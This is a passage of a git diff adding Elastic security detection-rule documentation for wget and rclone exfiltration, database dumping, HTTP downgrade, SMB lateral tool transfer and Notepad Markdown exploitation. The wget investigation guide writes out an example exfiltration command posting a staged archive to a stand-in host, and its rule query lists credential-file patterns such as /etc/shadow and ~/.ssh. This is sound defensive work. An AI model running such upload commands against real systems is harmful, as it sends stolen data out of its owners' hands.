https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc new file mode 100644 index 0000000000..02e576a8d1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc @@ -0,0 +1,167 @@ +[[prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget]] +=== Potential Data Exfiltration Through Wget + +Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://gtfobins.github.io/gtfobins/wget/ +* https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Exfiltration +* Data Source: Auditd Manager +* Data Source: Elastic Defend +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Data Source: Elastic Endgame +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Data Exfiltration Through Wget* + + +This rule flags Linux processes that launch wget with options that upload a local file via HTTP POST, a behavior used to exfiltrate staged data to an external server. Attackers gather files, compress them in /tmp, then execute wget --post-file=/tmp/loot.tar.gz https://example.com/upload from a non-interactive shell or cron job to covertly push the archive out over standard web traffic. + + +*Possible investigation steps* + + +- Pull the full command line to extract the posted file path, verify the file still exists, capture size/timestamps, and hash its contents to gauge sensitivity and origin. +- Review the process tree and session context (parent, user, TTY, cron/systemd/container) and correlate with recent logins or scheduler entries to determine whether this was automated or a remote shell action. +- Enrich the destination endpoint with DNS, WHOIS, certificate, proxy, and egress firewall logs, and check for prior communications from this host to the same domain/IP to assess legitimacy. +- Pivot 30–60 minutes prior on the host/user for staging activity such as tar/gzip in /tmp, bulk file collection, or discovery commands, and interrogate shell history and filesystem events tied to the posted file. +- If the file was removed post-upload, attempt recovery from EDR or backups and estimate exfil volume and content types via proxy or egress gateway logs to determine impact and drive containment. + + +*False positive analysis* + + +- A maintenance or monitoring script run via cron posts log archives or configuration snapshots using wget --post-file to an internal HTTP endpoint for routine diagnostics. +- An administrator or developer testing a web form or API uses wget --body-file to POST a sample file during troubleshooting, producing a benign one-off event. + + +*Response and remediation* + + +- Immediately isolate the host, terminate the offending wget process, block outbound HTTP(S) to the destination domain/IP seen in the command wget --post-file=/path/to/file https://example.com/upload, and quarantine the posted file path and its parent directory. +- Identify and disable any cron, systemd, or shell script that invoked wget with --post-file or --body-file (e.g., entries in /etc/cron.d/, user crontabs, or /home/user/.local/bin/upload.sh), delete the script, and revoke the invoking account’s API tokens and SSH keys. +- Remove staged archives and temp files referenced in the upload (e.g., /tmp/loot.tar.gz and /var/tmp/*.gz), delete companion tooling or collection scripts found alongside them, and reimage the host if system integrity cannot be assured. +- If the posted content includes credentials, source code, or customer data, rotate affected passwords/keys, invalidate tokens, notify data owners, and restore impacted systems or files from known-good backups. +- Escalate to incident response and initiate wider containment if the destination domain/IP is not owned by the organization or resolves to an anonymizing/VPS service, if multiple hosts exhibit wget --post-file from non-interactive sessions, or if the uploader executed as root. +- Harden by enforcing SELinux/AppArmor policies that restrict wget/curl from posting files, requiring egress web proxy allowlists for HTTP POST destinations, adding detections for wget --post-file/--body-file and curl --upload-file/-F, and removing wget from systems where it is unnecessary. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and +process.name == "wget" and ?process.parent.executable != null and ( + process.args like ("--post-file*", "--post-data*", "--body-file*") or + ( + process.command_line like ("*cat*", "*base64*") and + process.command_line like ( + "*/etc/passwd*", "*/etc/shadow*", "*~/.ssh/*", "*.env*", "*credentials*", "*/tmp/*", + "*/var/tmp/*", "*/dev/shm/*", "*/home/*/*", "*/root/*" + ) + ) +) and +( + process.command_line like ("*http:*", "*https:*") or + process.command_line regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}.*" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc new file mode 100644 index 0000000000..4d1735290e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone]] +=== Potential Data Exfiltration via Rclone + +Identifies abuse of rclone (or a renamed copy, e.g. disguised as a security or backup utility) to exfiltrate data to cloud storage or remote endpoints. Rclone is a legitimate file sync tool; threat actors rename it to blend with administrative traffic and use copy/sync with cloud backends (e.g. :s3:) and include filters to exfiltrate specific file types. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1048/ +* https://rclone.org/commands/rclone_copy/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Exfiltration +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Elastic Endgame +* Data Source: Windows Security Event Logs + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Data Exfiltration via Rclone* + + +Rclone is a legitimate file synchronization tool. Threat actors abuse it (often renamed, e.g. to TrendFileSecurityCheck.exe) to exfiltrate data to S3, HTTP endpoints, or other cloud backends, using `copy`/`sync` with `--include` filters and high `--transfers` to move specific file types at scale. + + +*Possible investigation steps* + + +- Confirm the command line for `copy`/`sync`, cloud backend (e.g. `:s3:`, `:http`), and options like `--include`, `--transfers`, `-P`. +- If the process name is not `rclone.exe`, compare with `process.pe.original_file_name`; a mismatch indicates a renamed copy used to evade name-based detection. +- From the command line, identify the source path (e.g. UNC or local) and the remote backend (S3 bucket, HTTP endpoint) as the exfil destination. +- Review `--include`/`--exclude` and `--max-age`/`--max-size` to understand what data was targeted (documents, CAD, archives, etc.). +- Correlate with the process executable path (recently dropped?), parent process, and user; look for outbound network to the same backend. + + +*False positive analysis* + + +- Legitimate backup or sync jobs using rclone from a known path and config may trigger; allowlist by process path or `--config` path for approved rclone usage. + + +*Response and remediation* + + +- Terminate the rclone process and isolate the host if exfiltration is confirmed. +- Identify and revoke access to the destination (S3 bucket, API keys, etc.); preserve logs for the exfil session. +- Determine scope of data exposed and notify stakeholders; rotate credentials and secrets that may have been in exfiltrated paths. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "rclone.exe" or ?process.pe.original_file_name == "rclone.exe") and process.args : ("copy", "sync") and + not process.args : ("--config=?:\\Program Files\\rclone\\config\\rclone\\rclone.conf", "--config=?:\\Program Files (x86)\\rclone\\config\\rclone\\rclone.conf") and + not process.executable : ("?:\\Program Files*", "\\Device\\HarddiskVolume*\\Program Files*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc new file mode 100644 index 0000000000..0ec78d65d4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-18-potential-database-dumping-activity]] +=== Potential Database Dumping Activity + +This rule detects the use of database dumping utilities to exfiltrate data from a database. Attackers may attempt to dump the database to a file on the system and then exfiltrate the file to a remote server. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Exfiltration +* Data Source: Elastic Defend +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Data Source: Elastic Endgame +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Database Dumping Activity* + + +This alert flags a Linux process starting a common database export tool, which matters because these utilities can quickly copy entire datasets into portable files for theft. An attacker with shell access may run mysqldump, pg_dump, or mongodump to dump customer records or application data to disk and then transfer the archive off the host over a separate network channel. + + +*Possible investigation steps* + + +- Review the full command line, parent and ancestor process chain, and execution user to determine whether the dump was launched by approved backup automation, an administrator shell, or an unexpected process such as a web server or scripting interpreter. +- Validate whether the account and host normally perform database backups by comparing the activity with change windows, cron or systemd timer jobs, deployment scripts, and historical executions on this and similar systems. +- Identify any dump artifacts created around the alert by looking for new large files, archive or compression activity, staging in temporary directories, or writes to mounted shares that could indicate preparation for transfer. +- Examine surrounding authentication and network activity for signs of compromise or exfiltration, including recent SSH or VPN access to the host, unusual database logins, and outbound connections or file transfers shortly after the dump began. +- If the activity is not authorized, isolate the host as appropriate and scope for related activity across the environment by searching for the same user, parent process, command pattern, and follow-on transfer utilities on other systems. + + +*False positive analysis* + + +- Scheduled backup or maintenance scripts may legitimately run pg_dump, mysqldump, or mongodump on Linux database hosts; confirm the execution user, parent process, and timing match documented cron or systemd jobs and that the output is written to the expected backup location. +- A DBA or application administrator may manually export data for migration, troubleshooting, or upgrade validation; verify the user account, shell history or change records, and command-line options align with an approved maintenance task and that no unusual outbound transfer follows the dump. + + +*Response and remediation* + + +- Quarantine the affected Linux host from the network except for approved management access, stop any active pg_dump, mysqldump, mariadb-dump, pg_dumpall, or mongodump activity and any follow-on compression or transfer processes, and block the account and destination used to stage the dump. +- Remove attacker persistence by deleting unauthorized cron jobs, systemd services or timers, startup scripts, SSH authorized_keys entries, web shells, and any scripts or binaries used to create, archive, or move the database export. +- Revoke and rotate the database credentials, local passwords, SSH keys, and API tokens exposed on the host, then review database users for newly granted backup, export, replication, or superuser privileges and disable anything not explicitly approved. +- Restore to a known-good state by rebuilding the host or reverting from a trusted image, validating the database against clean backups, and deleting dump files, archives, and copied datasets from temporary directories, mounted shares, and storage buckets. +- Escalate to incident response immediately if any dump file was transferred to an external server, cloud service, or user workstation, if similar dumping activity is found on other hosts, or if the attacker used a privileged administrator or database account. +- Harden the environment by limiting dump utilities to approved backup hosts and service accounts, enforcing MFA and least privilege for administrators, restricting outbound network paths from database servers, and alerting on new dump archives or unexpected database export tool execution. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2") and +process.name in ("pg_dump", "pg_dumpall", "mysqldump", "mariadb-dump", "mongodump") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc new file mode 100644 index 0000000000..88c6db4ca5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc @@ -0,0 +1,113 @@ +[[prebuilt-rule-8-19-18-potential-http-downgrade-attack]] +=== Potential HTTP Downgrade Attack + +Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-nginx.access-* +* logs-apache.access-* +* logs-apache_tomcat.access-* +* logs-traefik.access-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: Traefik +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential HTTP Downgrade Attack* + + +This detection surfaces HTTP traffic negotiating a protocol version that deviates from your baseline, a sign of downgrade attempts that strip protections and enable evasion or exploit paths in older behaviors. An attacker deliberately breaks HTTP/2 negotiation so the server falls back to HTTP/1.1, then probes with crafted headers and chunked bodies to attempt request smuggling or cache bypass against web services. + + +*Possible investigation steps* + + +- Correlate with TLS termination or load balancer logs to verify ALPN or Upgrade negotiation (server advertising h2) and whether the same client/IP previously used h2 with the same SNI/Host, distinguishing forced downgrade from capability mismatch. +- Review the downgraded requests for exploitation indicators such as simultaneous Content-Length and Transfer-Encoding headers, duplicated or mixed-case headers, unusual methods (TRACE or PRI), or inconsistent chunked encoding suggesting smuggling attempts. +- Examine surrounding response patterns for increased 400/421/426/431/505, backend 5xx, connection resets, or latency spikes that coincide with these requests and indicate error-driven fallback or probing. +- Check for recent config changes or incidents on CDNs/WAFs/load balancers and web servers (e.g., http2 enablement, ALPN lists, h2/h2c settings) that could have disabled HTTP/2 and caused benign fallbacks. +- Cluster events by source IP/User-Agent/ASN and targeted host to identify campaign activity across services and pivot the sources through threat intelligence or reputation feeds. + + +*False positive analysis* + + +- Recent Nginx/Apache/Tomcat configuration changes that disable HTTP/2/h2c or alter TLS/ALPN on specific virtual hosts can legitimately force clients to fall back to HTTP/1.1, surfacing as a downgrade event in access logs. +- Newly onboarded internal services or scripts that only support HTTP/1.0/1.1 and begin hitting an endpoint for the first time can introduce a first-seen older http.version relative to an HTTP/2 baseline without malicious intent. + + +*Response and remediation* + + +- Immediately block or challenge source IPs/ASNs repeatedly forcing HTTP/1.1 to hosts that previously negotiated HTTP/2 via ALPN, and enable WAF rules to drop “Upgrade: h2c” attempts, requests with both Content-Length and Transfer-Encoding, or duplicated/mixed-case headers. +- Remove downgrade paths by requiring TLS+ALPN “h2” on 443 (e.g., Nginx listen 443 ssl http2; Apache Protocols h2 http/1.1), disabling cleartext h2c and HTTP/1.0 on public endpoints, and ensuring intermediaries do not strip ALPN or rewrite headers. +- Redeploy corrected configs and validate end-to-end HTTP/2 with curl --http2 and browser devtools, then confirm normal 2xx/3xx rates and elimination of 421/426/431/505 responses and backend 5xx spikes around previously downgraded traffic. +- Escalate to Incident Response if downgraded requests show smuggling patterns (simultaneous Content-Length and Transfer-Encoding, mixed-case duplicates, TRACE/PRI methods), hit sensitive paths (/admin, /login, /actuator), or trigger cache anomalies like cross-user content. +- Harden parsing and caching by normalizing headers at the edge, enforcing a single Content-Length, disabling TRACE, setting strict client_header_buffer_size and large_client_header_buffers, and configuring proxies/backends to reject conflicting CL/TE or ambiguous chunked bodies. + + +==== Rule query + + +[source, js] +---------------------------------- +http.version:* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Downgrade Attack +** ID: T1562.010 +** Reference URL: https://attack.mitre.org/techniques/T1562/010/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc new file mode 100644 index 0000000000..43cbe95b95 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share]] +=== Potential Lateral Tool Transfer via SMB Share + +Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* +* logs-endpoint.events.network-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper +* https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 112 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Lateral Tool Transfer via SMB Share* + + +Adversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. Attackers can also leverage file shares that employees frequently access to host malicious files to gain a foothold in other machines. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve the created file and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +*False positive analysis* + + +- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges needed to write to the network share and restrict write access as needed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=30s + [network where host.os.type == "windows" and event.type == "start" and process.pid == 4 and destination.port == 445 and + network.direction : ("incoming", "ingress") and + network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" + ] by process.entity_id + /* add more executable / script extensions here if they are not noisy in your environment */ + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and user.id like ("S-1-5-21*", "S-1-12-*") and + (file.Ext.header_bytes : "4d5a*" or file.extension : ("exe", "scr", "pif", "com", "dll", "bat", "cmd", "ps1", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta", "cpl"))] by process.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc new file mode 100644 index 0000000000..e5e6343b69 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation]] +=== Potential Notepad Markdown RCE Exploitation + +Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-windows.sysmon_operational-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Microsoft Defender for Endpoint +* Data Source: Sysmon +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Notepad Markdown RCE Exploitation* + + +This rule detects a new child process launched by `notepad.exe` when Notepad was opened with a Markdown (`.md`) file. +This behavior can indicate exploitation of a Notepad remote code execution vulnerability where crafted Markdown content +triggers unintended process execution. + + +*Possible investigation steps* + + +- Validate the parent-child relationship and confirm `notepad.exe` is the direct parent of the suspicious process. +- Review the full command line of both parent and child processes, including the Markdown file path in `process.parent.args`. +- Identify the Markdown file source (email attachment, browser download, chat client, removable media, or network share). +- Inspect process ancestry and descendants for additional payload execution, script interpreters, or LOLBIN activity. +- Correlate with file, registry, and network events around the same timestamp to identify follow-on behavior. +- Determine whether the child process and its execution path are expected in your environment. + + +*False positive analysis* + + +- Legitimate automation or editor extensions may occasionally spawn helper processes from Notepad workflows. +- User-driven workflows that invoke external tools from Markdown previews can trigger this behavior. +- If benign, tune by excluding known-safe child process names, hashes, signed binaries, and approved file paths. + + +*Response and remediation* + + +- Isolate affected endpoints until scope is understood. +- Terminate suspicious child and descendant processes initiated from `notepad.exe`. +- Quarantine and preserve the triggering Markdown file for forensic analysis. +- Run endpoint malware scans and collect volatile artifacts (running processes, network connections, autoruns). +- Patch Windows/Notepad to the latest security update level addressing the vulnerability. +- Hunt for the same parent-child pattern across other hosts to identify additional impacted systems. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "notepad.exe" and process.parent.args : "*.md" and + not process.executable : "C:\\Program Files\\WindowsApps\\Microsoft.WindowsNotepad_*\\Notepad\\Notepad.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git 